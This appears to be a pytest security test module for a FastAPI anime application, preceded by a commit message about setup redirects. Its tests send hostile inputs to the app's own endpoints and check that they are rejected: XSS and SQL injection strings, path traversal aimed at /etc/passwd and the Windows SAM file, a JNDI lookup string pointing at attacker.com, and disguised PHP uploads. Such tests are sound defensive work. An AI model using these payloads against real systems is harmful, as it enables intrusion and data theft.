- Created SetupRedirectMiddleware to redirect unconfigured apps to /setup
- Enhanced /api/auth/setup endpoint to save anime_directory to config
- Updated SetupRequest model to accept optional anime_directory parameter
- Modified setup.html to send anime_directory in setup API call
- Added @pytest.mark.requires_clean_auth marker for tests needing unconfigured state
- Modified conftest.py to conditionally set up auth based on test marker
- Fixed all test failures (846/846 tests now passing)
- Updated instructions.md to mark setup tasks as complete

This implementation ensures users are guided through initial setup before accessing the application, while maintaining test isolation and preventing auth state leakage between tests.
396 lines
13 KiB
Python
396 lines
13 KiB
Python
"""
|
|
Input Validation Security Tests.
|
|
|
|
This module tests input validation across the application to ensure
|
|
all user inputs are properly sanitized and validated.
|
|
"""
|
|
|
|
import pytest
|
|
from httpx import AsyncClient
|
|
|
|
from src.server.fastapi_app import app
|
|
|
|
|
|
@pytest.mark.security
class TestInputValidation:
    """Security tests for input validation.

    Every test sends hostile or malformed input to an endpoint of the
    imported ``app`` through an in-process ASGI client and checks the
    resulting status code. Where a request may legitimately be accepted,
    the response body is inspected instead.
    """

    @pytest.fixture
    async def client(self):
        """Yield an ``AsyncClient`` that talks to ``app`` over ASGI."""
        from httpx import ASGITransport

        async with AsyncClient(
            transport=ASGITransport(app=app), base_url="http://test"
        ) as ac:
            yield ac

    @pytest.mark.asyncio
    async def test_xss_in_anime_title(self, client):
        """Test XSS protection in anime title input.

        Only accepted (200) responses are inspected; any other status code
        is treated as a rejection and not asserted on.
        """
        xss_payloads = [
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            "javascript:alert('XSS')",
            "<svg onload=alert('XSS')>",
        ]

        for payload in xss_payloads:
            response = await client.post(
                "/api/anime",
                json={"title": payload, "description": "Test"},
            )

            # Should either reject or sanitize
            if response.status_code == 200:
                # If accepted, the echoed title must be sanitized
                data = response.json()
                title = data.get("data", {}).get("title", "")
                assert "<script>" not in title.lower()
                assert "onerror" not in title.lower()
                assert "javascript:" not in title.lower()

    @pytest.mark.asyncio
    async def test_oversized_input(self, client):
        """Test handling of extremely large inputs."""
        # One million characters in a single field
        huge_string = "A" * 1000000  # 1MB of data

        response = await client.post(
            "/api/anime",
            json={"title": huge_string, "description": "Test"},
        )

        # Should reject or truncate
        assert response.status_code in [400, 413, 422]

    @pytest.mark.asyncio
    async def test_null_byte_injection(self, client):
        """Test null byte injection protection."""
        null_byte_payloads = [
            "filename.txt\x00.exe",
            "test\x00admin",
            "user\x00' OR '1'='1",
        ]

        for payload in null_byte_payloads:
            response = await client.post(
                "/api/anime/search",
                params={"query": payload},
            )

            # Should handle safely
            assert response.status_code in [200, 400, 422]

    @pytest.mark.asyncio
    async def test_unicode_bypass_attempts(self, client):
        """Test handling of unicode bypass attempts."""
        unicode_payloads = [
            "admin\u202e",  # Right-to-left override
            "\ufeffadmin",  # Zero-width no-break space
            "ad\u200bmin",  # Zero-width space
        ]

        for payload in unicode_payloads:
            response = await client.post(
                "/api/auth/login",
                json={"username": payload, "password": "test"},
            )

            # Should not bypass security
            assert response.status_code in [401, 422]

    @pytest.mark.asyncio
    async def test_path_traversal_in_file_access(self, client):
        """Test path traversal protection.

        A 200 response is tolerated only when the body looks like an HTML or
        error page rather than the content of the targeted file.
        """
        traversal_payloads = [
            "../../../etc/passwd",
            "..\\..\\..\\windows\\system32\\config\\sam",
            "....//....//....//etc/passwd",
            "..%2F..%2F..%2Fetc%2Fpasswd",
        ]

        for payload in traversal_payloads:
            response = await client.get(f"/static/{payload}")

            # Should not access sensitive files
            # App returns error page (200) or proper error code
            if response.status_code == 200:
                # Verify it's an error page, not the actual file
                content = response.text.lower()
                assert (
                    "error" in content or
                    "not found" in content or
                    "<!doctype html>" in content
                ), "Response should be error page, not sensitive file"
            else:
                assert response.status_code in [400, 403, 404]

    @pytest.mark.asyncio
    async def test_negative_numbers_where_positive_expected(
        self, client
    ):
        """Test handling of negative numbers in inappropriate contexts."""
        response = await client.post(
            "/api/downloads",
            json={
                "anime_id": -1,
                "episode_number": -5,
                "priority": -10,
            },
        )

        # Should reject negative values
        assert response.status_code in [400, 422]

    @pytest.mark.asyncio
    async def test_special_characters_in_username(self, client):
        """Test handling of special characters in usernames.

        Only accepted (200) responses are inspected; the returned username
        must not contain a literal ``<script>`` tag.
        """
        special_chars = [
            "user<script>",
            "user@#$%^&*()",
            "user\n\r\t",
            "user'OR'1'='1",
        ]

        for username in special_chars:
            response = await client.post(
                "/api/auth/register",
                json={
                    "username": username,
                    "password": "SecureP@ss123!",
                    "email": "test@example.com",
                },
            )

            # Should either reject or sanitize
            if response.status_code == 200:
                data = response.json()
                registered_username = data.get("data", {}).get(
                    "username", ""
                )
                assert "<script>" not in registered_username

    @pytest.mark.asyncio
    async def test_email_validation(self, client):
        """Test email format validation."""
        invalid_emails = [
            "notanemail",
            "@example.com",
            "user@",
            "user space@example.com",
            "user@example",
        ]

        for index, email in enumerate(invalid_emails):
            response = await client.post(
                "/api/auth/register",
                json={
                    # Index-based name keeps the request reproducible:
                    # hash() of a str is salted per process and may be
                    # negative, which made the username vary between runs.
                    "username": f"user_{index}",
                    "password": "SecureP@ss123!",
                    "email": email,
                },
            )

            # Should reject invalid emails
            assert response.status_code in [400, 422]

    @pytest.mark.asyncio
    async def test_array_injection(self, client):
        """Test handling of array inputs in unexpected places."""
        response = await client.post(
            "/api/anime",
            json={
                "title": ["array", "instead", "of", "string"],
                "description": "Test",
            },
        )

        # Should reject or handle gracefully
        assert response.status_code in [400, 422]

    @pytest.mark.asyncio
    async def test_object_injection(self, client):
        """Test handling of object inputs in unexpected places."""
        response = await client.post(
            "/api/anime/search",
            params={"query": {"nested": "object"}},
        )

        # Should reject with proper error or handle gracefully
        # API converts objects to strings and searches for them (returns [])
        if response.status_code == 200:
            # Verify it handled it safely (returned empty or error)
            data = response.json()
            assert isinstance(data, list)
            # Should not have executed the object as code
            assert "nested" not in str(data).lower() or len(data) == 0
        else:
            assert response.status_code in [400, 422]
|
|
|
|
|
|
@pytest.mark.security
@pytest.mark.requires_clean_auth
class TestAPIParameterValidation:
    """Security tests for API parameter validation.

    NOTE(review): the ``requires_clean_auth`` marker presumably makes the
    suite start unconfigured so ``get_auth_token`` can run the setup call
    itself -- confirm against conftest.py.
    """

    @pytest.fixture
    async def client(self):
        """Yield an ``AsyncClient`` that talks to ``app`` over ASGI."""
        from httpx import ASGITransport

        async with AsyncClient(
            transport=ASGITransport(app=app), base_url="http://test"
        ) as ac:
            yield ac

    async def get_auth_token(self, client):
        """Set a master password, log in with it and return the token.

        Args:
            client: HTTP client used for the setup and login requests.

        Returns:
            The ``access_token`` value from the login response body.

        Raises:
            AssertionError: If the login response carries no
                ``access_token``; the message includes the status code and
                the decoded body.
        """
        password = "SecurePass123!"
        await client.post(
            "/api/auth/setup",
            json={"master_password": password}
        )
        login_response = await client.post(
            "/api/auth/login",
            json={"password": password}
        )
        payload = login_response.json()
        # Fail with a readable message instead of a bare KeyError when
        # setup or login did not succeed.
        assert "access_token" in payload, (
            f"login failed ({login_response.status_code}): {payload!r}"
        )
        return payload["access_token"]

    @pytest.mark.asyncio
    async def test_invalid_pagination_parameters(self, client):
        """Test handling of invalid pagination parameters."""
        token = await self.get_auth_token(client)
        headers = {"Authorization": f"Bearer {token}"}

        invalid_params = [
            {"page": -1, "per_page": 10},
            {"page": 1, "per_page": -10},
            {"page": 999999999, "per_page": 999999999},
            {"page": "invalid", "per_page": "invalid"},
        ]

        for params in invalid_params:
            response = await client.get(
                "/api/anime", params=params, headers=headers
            )

            # Should reject or use defaults, or 503 when service unavailable
            assert response.status_code in [200, 400, 422, 503]

    @pytest.mark.asyncio
    async def test_injection_in_query_parameters(self, client):
        """Test injection protection in query parameters."""
        injection_queries = [
            "' OR '1'='1",
            "<script>alert('XSS')</script>",
            "${jndi:ldap://attacker.com/evil}",
            "{{7*7}}",
        ]

        for query in injection_queries:
            response = await client.get(
                "/api/anime/search", params={"query": query}
            )

            # Should handle safely
            assert response.status_code in [200, 400, 422]

    @pytest.mark.asyncio
    async def test_missing_required_parameters(self, client):
        """Test handling of missing required parameters."""
        response = await client.post("/api/auth/login", json={})

        # Should reject with appropriate error
        assert response.status_code == 422

    @pytest.mark.asyncio
    async def test_extra_unexpected_parameters(self, client):
        """Test handling of extra unexpected parameters.

        Only an accepted (200) response is inspected; it must not report
        ``is_admin`` as truthy under its ``data`` object.
        """
        response = await client.post(
            "/api/auth/login",
            json={
                "username": "testuser",
                "password": "test",
                "unexpected_field": "malicious_value",
                "is_admin": True,  # Attempt to elevate privileges
            },
        )

        # Should ignore extra params or reject
        if response.status_code == 200:
            # Should not grant admin from parameter
            data = response.json()
            assert not data.get("data", {}).get("is_admin", False)
|
|
|
|
|
|
@pytest.mark.security
class TestFileUploadSecurity:
    """Upload-endpoint security checks.

    Each test posts a crafted multipart file to ``/api/upload`` and expects
    one of a small set of rejection status codes.
    """

    @pytest.fixture
    async def client(self):
        """Provide an ``AsyncClient`` wired to ``app`` through ASGI."""
        from httpx import ASGITransport

        asgi_transport = ASGITransport(app=app)
        async with AsyncClient(
            transport=asgi_transport, base_url="http://test"
        ) as http:
            yield http

    @pytest.mark.asyncio
    async def test_malicious_file_extension(self, client):
        """Uploads with executable or script extensions are refused."""
        rejection_codes = [400, 403, 415]
        blocked_suffixes = [".exe", ".sh", ".bat", ".cmd", ".php", ".jsp"]

        for suffix in blocked_suffixes:
            upload = {"file": ("test" + suffix, b"malicious content")}
            reply = await client.post("/api/upload", files=upload)

            # Every dangerous extension must be turned away
            assert reply.status_code in rejection_codes

    @pytest.mark.asyncio
    async def test_file_size_limit(self, client):
        """A 100 MB upload is refused."""
        size_in_bytes = 100 * 1024 * 1024  # 100MB
        oversized_body = b"A" * size_in_bytes

        upload = {"file": ("large.txt", oversized_body)}
        reply = await client.post("/api/upload", files=upload)

        # Oversized payloads must not be accepted
        assert reply.status_code in [413, 422]

    @pytest.mark.asyncio
    async def test_double_extension_bypass(self, client):
        """A ``.jpg.php`` filename is refused."""
        php_source = b"<?php phpinfo(); ?>"
        upload = {"file": ("image.jpg.php", php_source)}

        reply = await client.post("/api/upload", files=upload)

        # The trailing script extension must be detected
        assert reply.status_code in [400, 403, 415]

    @pytest.mark.asyncio
    async def test_mime_type_validation(self, client):
        """PHP content sent as ``image/jpeg`` is refused."""
        # Filename and declared type both claim JPEG; the bytes are PHP
        disguised_file = ("image.jpg", b"<?php phpinfo(); ?>", "image/jpeg")
        upload = {"file": disguised_file}

        reply = await client.post("/api/upload", files=upload)

        # The real content must be validated, not just the declared type
        assert reply.status_code in [400, 403, 415]
|